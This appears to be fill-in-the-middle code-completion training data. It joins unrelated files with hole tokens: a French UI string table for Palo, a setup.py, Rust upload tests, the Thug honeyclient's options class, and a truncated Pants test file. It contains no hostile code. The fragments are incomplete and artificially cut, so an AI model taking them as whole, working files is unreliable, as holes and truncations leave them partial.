"_lbl: picToImport": "Fichier image pour l'import (uniquement .gif, .jpg, .jpeg et .png possible)", "Edit Picture": "Modifier l'image", "Delete Picture": "Supprimer l'image", "impImg_msgWrongType": "Format d'image non supporté !", "imgDlg_genError": "L\'import de l\'image n\'est pas possible.", "imgDlg_deleteError": "Il n'est pas possible de supprimer l'image sélectionnée !", "Unable to import picture": "L\'import de l\'image n\'est pas possible.", "imgFile_toBig": "L\'image est trop grande. 
La taille maximale de l\'image est 2MB.", "imgFile_unsupportedType": "Format d'image non supporté !", "imgFile_undefError": "Une erreur inconnue est survenue.", "Reset": "Annuler", //Sheet Move OR Copy dialog "(new book)": "(nouvelle feuille de calcul)", "(move to end)": "(mettre à la fin)", "To Book": "Dans la feuille de calcul", "Before sheet": "Coller avant", "Move or Copy": "Déplacer/Copier", "Create a copy": "Créer une copie", //Rename Sheet Dialog "New Name": "Nouveau nom", "informationMsg": "Le nom existe déjà", "adviceMsg": "Indiquer un nouveau nom", // Status Bar Localization "Designer": "Designer", "User": "Utilisateur", "QuickView": "Aperçu rapide", "Ready": "Prêt", "Mode": "Mode", //Paste Special Dialog "All using Source theme": "Tout ce qu'utilise la plage source", "All except borders": "Tout sauf bordure", "Column widths": "Largeurs des colonnes", "Formulas and number": "Formules et nombre", "Values and number formats": "Valeurs et format de nombres", "Substract": "Soustraire", "Multiply": "Multiplier", "Divide": "Diviser", "Skip blanks": "Sauter les blancs", "Transpose": "Transposer", "Paste Link": "Insérer lien", "Formulas and number formats": "Formules et formats de nombres", "Myltiply": "Multiplier", "Transponse": "Transposer", "All": "Tous", "Content Types": "Types de contenu", "Values": "Valeurs", "Styles": "Styles", "Formats": "Formats", "Conditional Formats": "Format conditionnel", "Cell Metadata": "Métadonnée de cellule", "Cancel": "Annuler", "OK": "OK ", //Name Manager Dialog "Value": "Valeur", "Refers To": "Fait référence à", "Scope": "Portée", "Name Manager": "Gérer les noms", "Edit Name": "Modifier le nom", "Save Range": "Enregistrer la plage", "Names Scoped to Worksheet": "Noms limités à cette feuille", "Names Scoped to Workbook": "Noms limités à ce classeur", "Names With Errors": "Noms avec erreurs", "Names Without Errors": "Noms sans erreur", "Named formula couldn't be created": "La formule nommée n\'a pas pu être créée", // Hyperlink "follHLInvalidRef": "Référence non valide", "follHLTmpDisabledRef": "Référence temporairement désactivée", "follHLInvalidRng": "Il n'est pas possible d'accéder à l'adresse du lien hypertexte.", "follHLInvalidSheet": "La feuille de calcul n\'existe pas.", "follHLNamedRngUnsupport": "Le lien hypertexte contient un lien vers une plage de cellules avec noms - actuellement non supporté.", "follHLInvalidFormat": "Le format du lien hypertexte est invalide.", "follHLInvalidWB": "Il n'est pas possible de trouver et d'ouvrir le classeur indiqué par le lien hypertexte.", "follHLInvalidDoc": "Il n'est pas possible de trouver et d'ouvrir le document indiqué par le lien hypertexte.", "follHLInvalidURL": "L\'URL du lien hypertexte est invalide.", "follHLTmpDisabledWB": "Les liens vers d\'autres classeurs ne fonctionnent pas dans ce mode d\'application.", "follHLTmpDisabledWS": "Les liens vers d\'autres feuilles ne fonctionnent pas dans ce mode d\'application.", "follHLInvTrgNRange": "Le plage cible nommé n\'existe pas.", "follHLNotSuppInStandalone": "La cible du lien hypertexte n\'est pas supporté en mode standalone. Il ne peut être utilisés que dans Palo Studio.", "HLCntxNewWin": "Ouvrir le lien dans une nouvelle fenêtre.", "HLCntxNewTab": "Ouvrir le lien dans un nouvel onglet.", "HLCntxRemove": "Supprimer le lien hypertexte", "HLInvalidRefNotice": "Veuillez modifier pour le faire fonctionner correctement.", //New Name Dialog "Workbook": "Classeur", "newNameDlg_WarningMsg": "Vous n'avez pas correctement indiqué les paramètres. 
<br>Veuillez corriger les paramètres et essayer à nouveau.", "newNameDlg_NameWarningMsg": "Le nom indiqué n\'est pas valide.<br><br>La raison peut être :<br>   - Le nom commence par une lettre ou un souligné<br>   - Le nom contient un espace ou un autre signe non valide<br>   - Le nom est en conflit avec le nom d\'un élément de la solution ou avec un autre nom d\'objet dans le classeur", //Page Setup Dialog "Header": "En-tête", "Footer": "Pied de p.", "Horizontally": "Horizontalement", "Vertically": "Verticalement", "Orientation": "Centrer sur la page", "Custom Header": "En-tête personnalisé", "Custom Footer": "Pied de page personnalisé", "Print area": "Zone d'impression", "Gridlines": "Quadrillage", "Cell Errors As": "Cellules avec erreurs", "Down, then over": "Première vers le bas", "Over, then down": "Première à droite", "Page order": "Ordre des pages", "Adjust to": "Taille ", "Fit to": "Ajuster", "Page": "Page", "Margins": "Marges", "Header/Footer": "En-tête/Pied de page", "(none)": "(Aucun)", "Book": "Classeur", "of": "de", "Format text": "Format texte", "Portrait": "Portrait", "Landscape": "Paysage", "Paper size": "Format du papier", "Letter": "Format lettre", "Print quality": "Qualité d'impression", "First page": "Commencer la numérotation à", //Custom Header Footer "customHFLbl": "Pour formater le texte, sélectionnez le texte et cliquez ensuite sur le bouton Formet texte. <br>"+ "Pour insérer des numéros de page, la date, l'heure, des noms de fichier, des noms de feuille de calcul ou un chemin d'accès, positionnez le curseur dans la barre de traitement et cliquez sur le bouton souhaité.<br>"+ "Pour insérer une image, cliquez sur le bouton Insérer une image. <br><br>", "Insert Page Number": "Insérer le numéro de page", "Insert Number of Pages": "Insérer le nombre de pages", "Insert Date": "Insérer la date", "Insert Time": "Insérer l'heure", "Insert File Name": "Insérer le nom du fichier", "Insert Sheet Name": "Insérer le nom de la feuille de calcul", "Insert Picture": "Insérer une image", "Left section": "Section à gauche", "Center section": "Section au milieu", "Right section": "Section à droite", // Suspend Mode "suspModeMsg": "Le mode de designer est bloqué parce que le mode d\'utilisateur est ouvert dans une fenêtre.<br><br>Pour continuer, veuillez fermez cette fenêtre.", "Suspend Mode": "Mode en pause", // Form ComboBox Dialog "Format ComboBox": "Formater la ComboBox", "List Type": "Type de liste", "Palo Subset": "Sous-ensemble Palo", "Cell": "Cellule", "Select Wizard type": "Choisissez le type d'assistant", "WSS_FormComboBox_empty_source": "La source n\'est pas indiquée.", "WSS_FormComboBox_empty_target": "La destination n\'est pas indiquée.", "formel_inv_add": "Il n'est pas possible d'insérer l'élement formulaire.", "formel_exists": "L\'élément \"{nom}\" existe déjà.", "formel_nrange_exists": "Le nom de la plage cible \"{Nom}\" existe déjà.", "formel_no_nrange": "Le nom de la plage cible \"{Name}\" n\'existe pas.", "formel_inv_target": "La cellule cible ou la plage cible non valide.", "formel_inv_target_sheet": "La feuille cible \"{name}\" n\'existe pas.", "formel_add_wsel_err": "L\'insertion de l\'élément formulaire à la mémoire WSEl a échoué", "formel_proc_err": "Erreur de l'élément formulaire", "formel_edit": "Modifier {type}", "formel_delete": "Supprimer {type}", "formel_assign_macro_err": "Impossible d'assigner une macro.", "formel_no_el": "L\'élément cible n\'a pas été trouvé.", "ComboBox Name": "Nom de la ComboBox", "Subset": "Sous-ensemble", "checkbox_inv_state": "La 
Check Box a un statut invalide.", "CheckBox Name": "Nom de la Check Box", "Unchecked": "Non coché", "Checked": "Coché", "Mixed": "Mélangé", "Format Control": "Contrôle format", "Checkbox Label": "Libellé de la Check Box", "Button Label": "Libellé du bouton", "Button Name": "Nom du bouton", "Assign Macro": "Assigner une macro", "Application Error": "Erreur d'application", "noWBtoSwitch": "Il n'est pas possible de basculer vers la feuille sélectionnée.", "noWBtoClose": "Il n'est pas possible de de fermer le classeur sélectionné.", // Load Workbook messages "errLoadWB_intro": "Il n'est pas possible d'ouvrir le classeur.", "errLoadWB_noNode": "La connexion n\'a pas été trouvée.", "errLoadWB_noFile": "Le fichier n\'existe pas.", "errLoadWB_selErr": "Il n'est pas possible de sélectionner un classeur déjà ouvert.", "errLoadWB_coreErr": "Le système ne peut pas ouvrir le classeur sélectionné", "errLoadWB_noRights": "Droits d'accès insuffisants.", "errLoadWB_cyclicDep": "Cyclic dépendance existe entre le classeur sélectionné et ses ressources.", // PALO Import Wizard "PALO Import Wizard": "Assistant d'import Palo", "impPalo_msgWrongType": "Le chemin d\'accès complet vers le fichier TXT ou CSV doit être présent dans ce champ !", "impPalo_msgFieldBlank": "Veuillez choisir un fichier !", "Next": "Suivant", "Decimalpoint": "Point décimal", "_msg: Palo Import 1": "Cet assistant va vous permettre de parcourir les enregistrements dans la première ligne de la feuille active.", "_msg: Palo Import 21": "A cette étape, vous allez indiquer le fichier texte à importer.", "_msg: Palo Import 3": "Cliquez sur suivant pour voir l'enregistrement suivant ou terminer pour parcourir tous les enregistrements.", "Select the sourcefile (*.txt, *.csv)": "Choisissez le fichier source (*.txt, *.csv).", "Flat Textfile (*.txt, *.csv)": "Fichier texte (*.txt, *.csv)", "ODBC Query": "Requête ODBC", "Internal Loop (increse A1 until error in B1)": "Boucle interne (augmente A1 jusqu'à provoquer une erreur en B1)", "Tab": "Tabulation", "Comma": "Virgule", "Semicolon": "Point virgule", "Blank": "Blanc", "User-defined": "Défini par l'utilisateur", "Header exists": "En-têtes existants", "Step by Step": "Pas à pas", "_msg: PaloImport Wait": "Veuillez patienter, les données sont importées dans la feuille !", "Importing": "L\'import est en cours", "Finish": "Terminé", "_msg: PaloImport Upload": "Les données PALO ont été importées", "Uploading": "Chargement", // Function arguments dialog: funcArgs.js "_error: fnc_desc": "Erreur lors du chargement de la description de la fonction", "fnc_no_params": "La fonction n\'a pas de paramètres", "Function Arguments": "Arguments de la fonction", //Edit Macro "New Module": "Nouveau module", "Add New Module": "Ajouter un nouveau module", "Find": "Rechercher", "Modules Repository": "Référentiel de Modules", "Error Renaming Module": "Erreur en renommant le module", "rename_module_error_msg": "Erreur_renommant_le_module", "Macro Editor": "Editeur de Macro", "Rename Module": "Renommer le module", "Delete Module": "Supprimer le module", "Module": "Module", "edit_macro_no_module_selected_err": "edition_macro_erreur_aucun_module_sélectionné", "Error": "Erreur", //autoRefresh.js "Refresh every": "Actualiser toutes les", "seconds": "secondes", "Auto Refresh": "Actualisation automatique", // Autosave "File not saved": "Le fichier n\'est pas été enregistré", "autosave_msg": "Voulez-vous enregistrer vos modifications?", "Open and Repair": "Ouvrir et réparer", "Size": "Taille ", "date_format": "d/m/Y H:i:s", 
"astype_orig": "Ouvrir le fichier original (Date: {date} / Taille: {size})", "astype_recov": "Ouvrir le fichier de récupération de la liste:", "as_msg": "Le classeur n\'a pas été fermé correctement. Comment voulez-vous procéder?", // Quick Publish "_QP_unsaved_warning": "Le document non enregistré ne peut pas être publié. Souhaitez-vous enregistrer le document maintenant?", "_QP_error": "La publication n\'a pas fonctionné. Veuillez essayer de nouveau", "Report name": "Nom du rapport", "_QP_double_warning": "Un rapport nommé <b>{rName}</b> existe déjà dans le dossier sélectionné. Veuillez le renommer ou utiliser le nom suggéré.", "_QP_noSelection": "Veuillez sélectionnez le dossier où le classeur devrait être publié.", "Group": "Groupe", "Hierarchy": "Hiérarchie", "Publish": "Publication", "_QP_directions": "Choisissez le dossier où vous souhaitez publier le classeur.", "_QP_success": "Le classeur a été publié avec succès!", "Report must have name": "Le rapport doit porter un nom", //ribbon.js "Home":"Accueil", "View": "Affichage", "New<br>document":"Nouveau<br>document", "Create new document":"Créer un nouveau document", "Open":"Ouvrir", "Recent":"Dernières", "Open document":"Ouvrir un document", "Save":"Enregistrer", "Save document":"Enregistrer le document", "Export":"Export ", "XLSX":"XLSX ", "PDF":"PDF ", "HTML":"HTML ", "Save As":"Enregistrer sous", "Save As document":"Enregistrer comme un document", "Close":"Fermer", "Operation":"Opération", "Undo":"Annuler", "Redo":"Rétablir", "Clipboard":"Presse-papiers", "Paste":"Coller", "Paste Special":"Collage spécial", "Cut":"Couper", "Copy":"Copier", "Format Painter":"Reproduire la mise en forme", "Bold":"Gras", "Italic":"Italique", "Bottom Border":"Bordure inférieure", "Top Border": "Bordure supérieure", "Left Border": "Bordure gauche", "Right Border": "Bordure droite", "All Borders": "Toutes les bordures", "Outside Borders": "Bordures extérieures", "Thick Outside Border": "Bordure extérieure épaisse", "No Border": "Aucune bordure", "Top and Bottom Border": "Bordure en haut et en bas", "Thick Bottom Border": "Bordure épaisse en bas", "Top and Thick Bottom Border": "Bordure simple en haut et épaisse en bas", "More Borders": "Plus de bordure", "Fill Color": "Couleur de remplissage", "Font Color":"Couleur de police", "Alignment":"Alignement", "Left":"À gauche", "Align Text Left":"Aligner le texte à gauche", "Center":"Au centre", "Align Text Center":"Aligner le texte au centre", "Right":"À droite", "Merge Cells":"Fusionner les cellules", "Unmerge Cells":"Annuler la fusion des cellules", "Cells":"Cellules", "Insert Rows":"Insérer des lignes", "Insert Columns":"Insérer des colonnes", "Insert Sheet":"Insérer une feuille", "Delete":"Supprimer", "Delete Sheet":"Supprimer la feuille", "Format":"Format ", "AutoFit Row Height":"Ajustement automatique des lignes", "Column Width":"Largeur de colonne", "AutoFit Column Width":"Ajustement automatique des colonnes", "Rename Sheet":"Renommer la feuille", "Move or Copy Sheet":"Déplacer où copier la feuille", "Lock<br>Unlock":"Verouillée<br>déverrouillée", "Conditional<br>Formating":"Mise en forme<br>conditionnelle", "New Rule":"Nouvelle règle", "Clear Rules":"Supprimer des règles", "Clear Rules from Selected Cells":"Supprimer les règles des cellules sélectionnées", "Clear Rules from Entire Sheet":"Supprimer les règles de la feuille entière", "Manage Rules":"Gérer les règles", "Editing":"Modifier", "Clear All":"Effacer tout", "Clear Formats":"Effacer le format", "Clear Contents":"Effacer le contenu", "Quick 
View":"Aperçu rapide", "Designer Preview": "Aperçu Designer", "User Mode":"Mode d\'utilisateur", "Open User Mode":"Ouvrir le mode d'utilisateur", "Insert":"Insertion", "Ilustrations":"Illustrations", "Picture":"Image", "Links":"Liens", "Hyperlink":"Hyperlien", "Charts":"Graphiques", "Chart":"Graphique", "Micro Chart":"Micrographique", "Page Layout":"Mise en page", "Themes":"Thèmes", "Theme":"Thème", "Blue (default)":"Bleu (défaut)", "Gray":"Gris", "Dark":"Sombre", "Page Setup":"Mise en page", "Print<br>Preview":"Aperçu<br>avant impression", "Formulas":"Formules", "Function":"Fonction", "Insert<br>Funciton":"Insérer<br>fonction", "Defined Names":"Noms définis", "Name<br> Manager":"Gestion<br>des noms", "Define Name":"Définir un nom", "Calculation":"Calcul", "Refresh<br>Data":"Actualiser les données", "Auto - Refresh Data":"Actualiser les données automatiquement", "Show/Hide":"Afficher/Masquer", "Toolbars":"Barres d'outils", "Formula Bar":"Barre de formule", "Status Bar":"Barre d'état", "Window":"Fenêtre", "Arrange <br>All":"Réorganiser<br>tous", "Hide":"Masquer", "Unhide":"Démasquer", "Developer":"Développeurs", "Controls":"Contrôles", "Macro <br>Editor":"Editeur <br>Macro", "Combo Box":"Liste Déroulante", "Check Box":"Case à cocher", "Button":"Bouton", "Dyna Ranges":"Dyna_Ranges", "Horizontal <br> Dyna Range":"Dyna Range <br> Horizontal", "Vertical <br> Dyna Range":"Dyna Range <br> Vertical", "Create or Modify Reports":"Créer ou modifier les rapports", "Paste <br>View":"Créer<br>une vue", "Paste Elements":"Coller des éléments", "Paste Subset":"Coller un sous-ensemble", "Paste Function":"Fonction d'accès aux données", "Control and Modify Palo":"Contrôler et modifier Palo", "Modeller":"Outil de modélisation", "Import Data":"Import de données", "Save as Snapshot":"Sauvegarder comme instantané", "Info":"Info", "Wiki Palo":"Wiki Palo", "About Palo":"À propos de Palo", "Open documents": "Ouvrir des documents", "Help": "Aide", "_bold": "_gras", "_italic": "_italique", "Data labels orientation": "Orientation des étiquettes de données", "Rotate all text 90": "Rotation 90 du texte", "Rotate all text 270": "Rotation 270 du texte", "Custom angle": "Angle spécifique", "Palo_get_paste_view_init": "La vue collée n\'a pas été correctement stockée. Essayez de la recréer.", "Vertical Dynarange": "Vertical_DynaRange", "Horizontal Dynarange": "Horizontal_DynaRange", "CheckBox": "Case à cocher", "Variables": "Variables", "Private": "Privé", "Current Value": "Valeur Courante", "Used Variables": "Variables utilisées", "invalidContext": "L\'application a essayé d\'utiliser un contexte inexistant.", "Bring Forward": "Déplacer d\'un niveau vers l\'avant", "Bring to Front": "Déplacer vers l\'avant", "Please select rule to edit": "Veuillez sélectionner la règle à modifier.", "Send Backward": "Déplacer d\'un niveau vers l\'arrière", "Send to Back": "Déplacer vers l\'arrière", "save_as_override_msg": "Le fichier <b>{fileName}</b> existe déjà. Voulez-vous remplacer le fichier existant?", "execHLInvRange": "La cellule ou la plage du lien hypertexte n\'est pas valide.", "#N/A": "#N/A", "Bold Italic": "Gras Italique", "Cell/Range": "Cellule//Gamme", "Control": "Contrôle", "First": "Première", "Inside": "A l'intérieur", "Last": "Dernier", "Lose": "Perte", "Micro Chart Type": "Type", "Neg. Values": "Valeurs nég", "None": "Aucun", "Open Recent": "Classeurs dernières", "Outline": "A l'extérieur", "Pos. 
Values": "Valeurs pos.", "Reference": "Référence", "Regular": "Régulier", "Tie": "Équilibre", "Win": "Profit", "blank": "Laisser vide", "displayed": "Imprimer", "normal size": "de la taille normale", "page(s) wide by": "page(s) en largeur sur", "tall": "en hauteur", "wsel_inv_target": "La cellule cible ou la plage cible n\'est pas valide.", "wsel_inv_target_sheet": "La feuille cible \"{name}\" n\'existe pas.", "wsel_nrange_exists": "Le zone cible indiquée \"{name}\" existe déjà.", "Widgets": "Widgets", "Custom Widget": "Widget personnalisé", "widget_exists": "Widget \"{name}\" existe déjà.", "widget_add_wsel_err": "Adjonction de Widget au stockage WSEl était echoué.", "widget_edit": "Éditer Widget", "widget_delete": "Supprimer Widget", "WSS_Forms_empty_name": "Le nom n\'est pas précisé", "WSS_Widget_empty_content": "Le contenu des Widgets n\'est pas spécifié. S\'il vous plaît entrez le code HTML ou l\'URL.", "New name": "Nouveau nom", "inset_name_err_msg": "La formule nommée n'a pas pu être créé.", "currCoord_validate_err_msg": "Vous devez entrer une référence valide où vous voulez aller, ou tapez un nom valide pour la sélection.", "Show borders in User mode": "Afficher les bordures en mode utilisateur.", "new_folder_name_warrning": "Le nom de dossier <b> {new_name} </b> existe déjà. Type un autre nom pour le dossier.", "imp_success_msg": "Le fichier a été importé avec succès.", "Import log": "Journal d\'importation", "floatingElement_wrongSizePos": "La taille ou la position de l\'élément n\'est pas valide. Veuillez vérifier les valeurs de la taille et de la position dans le cadre.", "invalid_chart_sizepos": "La taille ou la position du graphique n\'est pas valide. Veuillez entrer des valeurs valides.", "invalid_picture_size": "La taille ou la position de l\'image n\'est pas valide. Veuillez entrer des valeurs valides.", "fopperLic": "Le licence pour imprimer PDF.", "License could not be checked": "La licence n\'a pas pu être vérifiée.", "License could not be found.": "La licence n\'a pas pu être trouvée.", "License could not be read.": "La licence n\'a pas pu être lu.", "License is not valid.": "La licence n\'est pas valide.", "no_perm_err_msg": "Vous n\'avez pas la permission pour cette opération.", "Zero suppression": "Omission du zéro", "Lock": "Verouiller", "Unlock": "Déverrouiller", "Vertical DynaRange": "Vertical DynaRange", "Horizontal DynaRange": "Horizontal DynaRange", "_error: empty targ name": "La cible du lien hypertexte est vide. Veuillez sélectionner ou entrer cible valide.", "Select target or <br />input frame name": "Options des trames", "Format Widget": "Format Widget", "Widget Name": "Nom de Widget", "macro_preselection_err_msg": "La macro affectée n\'est pas trouvé.<br>La macro affectée est renommé ou supprimé.<br>Veuillez réaffecter la macro à nouveau!", "Content": "Contenu", "errLoadFS_intro": "Impossible de charger le frameset.", "errLoadFS_noNode": "Impossible de trouver le frameset.", "Format painter": "Reproduire la mise en forme", "no_uxpc_err_msg": "Impossible d\'obtenir le privilège du système local.", "no_file_err_msg": "Impossible d\'accéder à le fichier local.", "Size & Position": "Taille et position", "Height": "Hauteur", "errFrameSave_noAccess": "Impossible d\'enregistrer le classeur \"{name}\" dans le frame \"{frame}\" en raison de\ndroits d\'accès insuffisants.", "macro_selection_wrg_msg": "Impossible d\'attribuer macro. 
Votre sélection est vide.<br>Veuillez sélectionner un macro dans la liste, et essayez à nouveau.", "Show legend": "Afficher la légende", "Bottom": "Dessous", "Top Right": "En haut à droite", "Show the legend without overlapping the chart": "Afficher la légende sans chevauchement du graphique", "Minimum value is 10": "La valeur minimale est 10", "Not correct format": "Le format n\'est pas correct", "min 10": "min 10", "Target_formElems": "Cible", "Convert": "Convertir", "Show log": "Afficher le journal.", "All Workbook Files": "Tous les classeur.", "fnArg_multiple": "multiples", "fnArg_number": "nombre", "fnArg_sequence": "séquence", "fnArg_any": "tout", "fnArg_logical": "logique", "fnArg_reference": "référence", "fnArg_text": "texte" };<|fim▁end|>
"No Color": "Pas de couleur", "More Colors": "Plus de couleurs",
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from setuptools import setup

setup(
    name='nspawn-api',
    packages=['nspawn'],
    include_package_data=True,
    install_requires=[
        'gunicorn',<|fim▁hole|>
        'nsenter',
        'flask',
        'pydbus',
        'supervisor'
    ],
)<|fim▁end|>
<|file_name|>tests.rs<|end_file_name|><|fim▁begin|>use rocket::local::Client;
use rocket::http::{Status, ContentType};
<|fim▁hole|>use std::io::Read;
use std::fs::{self, File};

const UPLOAD_CONTENTS: &str = "Hey! I'm going to be uploaded. :D Yay!";

#[test]
fn test_index() {
    let client = Client::new(super::rocket()).unwrap();
    let mut res = client.get("/").dispatch();
    assert_eq!(res.body_string(), Some(super::index().to_string()));
}

#[test]
fn test_raw_upload() {
    // Delete the upload file before we begin.
    let _ = fs::remove_file("/tmp/upload.txt");

    // Do the upload. Make sure we get the expected results.
    let client = Client::new(super::rocket()).unwrap();
    let mut res = client.post("/upload")
        .header(ContentType::Plain)
        .body(UPLOAD_CONTENTS)
        .dispatch();

    assert_eq!(res.status(), Status::Ok);
    assert_eq!(res.body_string(), Some(UPLOAD_CONTENTS.len().to_string()));

    // Ensure we find the body in the /tmp/upload.txt file.
    let mut file_contents = String::new();
    let mut file = File::open("/tmp/upload.txt").expect("open upload.txt file");
    file.read_to_string(&mut file_contents).expect("read upload.txt");
    assert_eq!(&file_contents, UPLOAD_CONTENTS);
}<|fim▁end|>
<|file_name|>ThugOpts.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # # ThugOpts.py # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, # MA 02111-1307 USA import sys import logging import six.moves.urllib.parse as urlparse from thug.DOM.Personality import Personality log = logging.getLogger("Thug") class ThugOpts(dict): proxy_schemes = ('http', 'socks4', 'socks5', ) def __init__(self): self._verbose = False self._debug = False self._proxy = None self._raise_for_proxy = True self.local = False self.extensive = False self._threshold = 0<|fim▁hole|> self._connect_timeout = 10 self._timeout = 600 self.ast_debug = False self.http_debug = 0 self._useragent = 'winxpie60' self._referer = 'about:blank' self._events = list() self._delay = 0 self._attachment = False self._file_logging = False self._json_logging = False self._maec11_logging = False self._es_logging = False self._code_logging = True self._cert_logging = True self._no_fetch = False self._broken_url = False self._vt_query = False self._vt_submit = False self._vt_runtime_apikey = None self._mongodb_address = None self._web_tracking = False self._honeyagent = True self.Personality = Personality() def set_verbose(self, verbose): self._verbose = verbose def get_verbose(self): return self._verbose verbose = property(get_verbose, set_verbose) def set_debug(self, debug): self._debug = debug def get_debug(self): return self._debug debug = property(get_debug, set_debug) def set_proxy(self, proxy): if not proxy: self._proxy = None return p = urlparse.urlparse(proxy) if p.scheme.lower() not in self.proxy_schemes: log.warning('[ERROR] Invalid proxy scheme (valid schemes: http, socks4, socks5)') sys.exit(0) self._proxy = proxy def get_proxy(self): return self._proxy proxy = property(get_proxy, set_proxy) def set_raise_for_proxy(self, raise_for_proxy): self._raise_for_proxy = raise_for_proxy def get_raise_for_proxy(self): return self._raise_for_proxy raise_for_proxy = property(get_raise_for_proxy, set_raise_for_proxy) def get_useragent(self): return self._useragent def set_useragent(self, useragent): if useragent not in self.Personality: log.warning('[WARNING] Invalid User Agent provided (using default "%s")', self._useragent) return self._useragent = useragent useragent = property(get_useragent, set_useragent) def get_referer(self): return self._referer def set_referer(self, referer): self._referer = referer referer = property(get_referer, set_referer) def get_events(self): return self._events def set_events(self, events): if not events: self._events = list() return for e in events.split(","): evt = e.lower().strip() if evt not in self._events: self._events.append(evt) events = property(get_events, set_events) def get_delay(self): return self._delay def set_delay(self, timeout): try: _timeout = int(timeout) except ValueError: log.warning('[WARNING] Ignoring invalid delay value (should be an integer)') return self._delay = abs(_timeout) delay = property(get_delay, set_delay) def 
get_attachment(self): return self._attachment def set_attachment(self, attachment): self._attachment = attachment attachment = property(get_attachment, set_attachment) def get_file_logging(self): return self._file_logging def set_file_logging(self, file_logging): self._file_logging = file_logging file_logging = property(get_file_logging, set_file_logging) def get_json_logging(self): return self._json_logging def set_json_logging(self, json_logging): self._json_logging = json_logging json_logging = property(get_json_logging, set_json_logging) def get_maec11_logging(self): return self._maec11_logging def set_maec11_logging(self, maec11_logging): self._maec11_logging = maec11_logging maec11_logging = property(get_maec11_logging, set_maec11_logging) def get_es_logging(self): return self._es_logging def set_es_logging(self, es_logging): self._es_logging = es_logging elasticsearch_logging = property(get_es_logging, set_es_logging) def get_code_logging(self): return self._code_logging def set_code_logging(self, code_logging): self._code_logging = code_logging code_logging = property(get_code_logging, set_code_logging) def get_cert_logging(self): return self._cert_logging def set_cert_logging(self, cert_logging): self._cert_logging = cert_logging cert_logging = property(get_cert_logging, set_cert_logging) def get_no_fetch(self): return self._no_fetch def set_no_fetch(self, fetch): self._no_fetch = fetch no_fetch = property(get_no_fetch, set_no_fetch) def get_threshold(self): return self._threshold def set_threshold(self, threshold): try: value = int(threshold) except ValueError: log.warning('[WARNING] Ignoring invalid threshold value (should be an integer)') return self._threshold = value threshold = property(get_threshold, set_threshold) def get_connect_timeout(self): return self._connect_timeout def set_connect_timeout(self, timeout): try: seconds = int(timeout) except ValueError: log.warning('[WARNING] Ignoring invalid connect timeout value (should be an integer)') return self._connect_timeout = seconds connect_timeout = property(get_connect_timeout, set_connect_timeout) def get_timeout(self): return self._timeout def set_timeout(self, timeout): try: seconds = int(timeout) except ValueError: log.warning('[WARNING] Ignoring invalid timeout value (should be an integer)') return self._timeout = seconds timeout = property(get_timeout, set_timeout) def get_broken_url(self): return self._broken_url def set_broken_url(self, mode): self._broken_url = mode broken_url = property(get_broken_url, set_broken_url) def get_vt_query(self): return self._vt_query def set_vt_query(self): self._vt_query = True vt_query = property(get_vt_query, set_vt_query) def get_vt_submit(self): return self._vt_submit def set_vt_submit(self): self._vt_submit = True vt_submit = property(get_vt_submit, set_vt_submit) def get_vt_runtime_apikey(self): return self._vt_runtime_apikey def set_vt_runtime_apikey(self, vt_apikey): self._vt_runtime_apikey = vt_apikey vt_runtime_apikey = property(get_vt_runtime_apikey, set_vt_runtime_apikey) def get_web_tracking(self): return self._web_tracking def set_web_tracking(self, enabled): self._web_tracking = enabled web_tracking = property(get_web_tracking, set_web_tracking) def get_honeyagent(self): return self._honeyagent def set_honeyagent(self, enabled): self._honeyagent = enabled honeyagent = property(get_honeyagent, set_honeyagent) def get_mongodb_address(self): return self._mongodb_address def set_mongodb_address(self, mongodb_address): self._mongodb_address = mongodb_address 
mongodb_address = property(get_mongodb_address, set_mongodb_address)<|fim▁end|>
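Each row in this dump pairs a prompt, in which a single <|fim▁hole|> token marks an elided span, with the completion text that fills it (for the ThugOpts.py row above the completion happens to be empty). A minimal sketch of how such a pair stitches back into plain source, assuming the literal marker tokens shown here; reassemble is a hypothetical helper, not part of any published library:

# Hypothetical helper: splice a FIM completion back into its prompt.
# Assumes the literal <|fim▁...|> tokens used in this dump.
def reassemble(prompt: str, completion: str) -> str:
    _, _, body = prompt.partition("<|end_file_name|>")  # drop the filename header
    body = body.removeprefix("<|fim▁begin|>").removesuffix("<|fim▁end|>")
    prefix, _, suffix = body.partition("<|fim▁hole|>")
    return prefix + completion + suffix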
<|file_name|>test_test.py<|end_file_name|><|fim▁begin|># Copyright 2018 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from abc import ABCMeta, abstractmethod from pathlib import PurePath from textwrap import dedent from typing import List, Tuple, Type from unittest.mock import Mock import pytest from pants.base.exceptions import ResolveError from pants.build_graph.address import Address from pants.engine.fs import ( EMPTY_DIRECTORY_DIGEST, Digest, FileContent, InputFilesContent, Workspace, ) from pants.engine.interactive_runner import InteractiveProcessRequest, InteractiveRunner from pants.engine.legacy.graph import HydratedTargetsWithOrigins, HydratedTargetWithOrigin from pants.engine.legacy.structs import TargetAdaptorWithOrigin from pants.engine.rules import UnionMembership from pants.rules.core.fmt_test import FmtTest from pants.rules.core.test import ( AddressAndTestResult, CoverageDataBatch, CoverageReport, FilesystemCoverageReport, Status, Test, TestDebugRequest, TestResult, TestRunner, WrappedTestRunner, run_tests, ) from pants.testutil.engine.util import MockConsole, MockGet, run_rule from pants.testutil.test_base import TestBase from pants.util.ordered_set import OrderedSet <|fim▁hole|> self.values = Mock(**values) class MockTestRunner(TestRunner, metaclass=ABCMeta): @staticmethod def is_valid_target(_: TargetAdaptorWithOrigin) -> bool: return True @staticmethod @abstractmethod def status(_: Address) -> Status: pass @staticmethod def stdout(_: Address) -> str: return "" @staticmethod def stderr(_: Address) -> str: return "" @property def test_result(self) -> TestResult: address = self.adaptor_with_origin.adaptor.address return TestResult(self.status(address), self.stdout(address), self.stderr(address)) class SuccessfulTestRunner(MockTestRunner): @staticmethod def status(_: Address) -> Status: return Status.SUCCESS @staticmethod def stdout(address: Address) -> str: return f"Successful test runner: Passed for {address}!" class ConditionallySucceedsTestRunner(MockTestRunner): @staticmethod def status(address: Address) -> Status: return Status.FAILURE if address.target_name == "bad" else Status.SUCCESS @staticmethod def stdout(address: 